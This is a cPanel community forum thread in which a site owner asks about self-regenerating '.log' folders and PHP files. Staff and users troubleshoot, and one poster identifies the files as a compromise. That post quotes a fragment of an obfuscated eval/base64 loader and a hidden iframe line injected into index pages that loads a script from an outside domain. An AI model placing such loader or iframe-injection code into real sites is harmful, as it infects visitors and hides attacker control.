The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Stop creating files in .log folder

Discussion in 'General Discussion' started by sunil31, Apr 28, 2011.

  1. sunil31

    sunil31 Registered

    Joined:
    Apr 28, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Hi All,

    I am sorry if this question has been asked earlier. I searched but could not find that why I am writing this question.

    I am using cPanel 11. There are more 2000 files generated automatically under .log folders on one of my website (see attachment log-file_SS.jpg ). Attachment is shown only for one folder. ".log" folders create automatically under 4-5 folders. I have to remove those files frequently after few days. Also some php files (83.php, success.php, etc.) also generated automatically despite deleting them frequently.

    Please help me to stop those files. It eats up my webspace.

    Thanks

    Sunil
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,482
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    By Default Wordpress does not create a log directory called aiycc.in in wp-admin, you might want to take a closer look at your mods on that site.
     
  3. sunil31

    sunil31 Registered

    Joined:
    Apr 28, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    WP is just one example. Log files are generating automatically on almost every folders. On website, we are using WP only for blog. There are other things on website for which we have developed our customize solution.

    You have written "you might want to take a closer look at your mods on that site.", could you explain how can I do this?
     
  4. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,482
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    In your wordpress admin, Plugins section.

    The log directory name is also a domain name. Does that mean something here? I'm not sure. But, if you are sure you have not installed anything named as that log directory is named, and you've spoken to your host to make sure they have nothing going on with that server creating these directories, I might be inclined to think you've got a bigger problem here than the logs, this could be some sort of sign that this account has been compromised.

    Either way, you might find more assistance with this at wordpress support. Whatever is creating those logs is not cPanel related.

    Good luck with this.
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Please also check the .htaccess file you have configured in /home/username/public_html location (where username is your cPanel username) to ensure that this isn't configured there to create such folders and files for logging purposes.

    Also, is this primarily happening for PHP scripts only? If so, you might also want to check any php.ini file you might have configured on the account to see what you have set for error logging in it.
     
  6. sunil31

    sunil31 Registered

    Joined:
    Apr 28, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Domain name is creating automatically in log directory. I have changed the password of the account but files are not stopping appear.
     
  7. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Have you checked your .htaccess file(s) for anything that might be creating these as I suggested? Changing the password would not prevent log files from forming, especially if these are being configured via .htaccess, your php.ini file or some other coding script on the account doing it.
     
  8. sunil31

    sunil31 Registered

    Joined:
    Apr 28, 2011
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    I have checked public_html or www folder. .htaccess file is there but in this file nothing is written. Could you tell me where I can find php.ini file?

    Thanks for helping me.
     
  9. obarrong

    obarrong Registered

    Joined:
    May 11, 2011
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    Hi,

    I don't know for sure if this question has been answered before but that damned ".log" folder
    is a HACK!!!
    Meaning that some m****r f****r has placed an ".php" script file on our servers
    - i'd migrated from Sharkspace to Hostgator recently and still found the same problem -

    We can surely find the ".php" script(s) in public_html
    the names really vary, you have to be keen and wise with the files on your public_html
    by example... "wqg.php 11348 bytes" is one of them...
    if you "edit" it, you will find something like:
    "eval(gzuncompress(base64_decode('eNqVWNtuIkc ... "

    this script CREATES a folder named ".log" and copies lots -way more than 10K- of ".html" files in it.
    The server where the copied files come usually varies
    so far i can only delete the scripts and with cPanel's "Legacy File Manager", and
    "Show Hidden Files (dotfiles)" CHECKED!!! I can see those damned ".log" folders -usually only on
    public_html files and delete them Fast!

    If you try to use some ftp client like FileZilla or WinSCP you'll only waste time cause them
    eliminate ONE FILE at a time.

    Please!!! If anybody knows of a sure way to avoid this "incursions" on our servers, please be kind
    to publish it!!!

    On another topic... another hacker ADDs one line to every "index.php/htm/html" in the
    public_html folder... such line is something like:
    <iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=1987810"></iframe>

    all I can do is delete all index.htm and index.html and leave only the index.php files
    on which the last "php" line is "die();"
    meaning that if the hacker adds his "iframe" line at the bottom of the index.php file, it NEVER
    executes. rendering the web safe -no awful antivirus warnings on our sites-
     
  10. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,482
    Likes Received:
    203
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    I read a post on LinkedIn recently linking to this site that sounds similar:
    /http://wewatchyourwebsite.com/wordpress/2011/05/what-hackers-wont-do-for-seo/
     
Loading...

Share This Page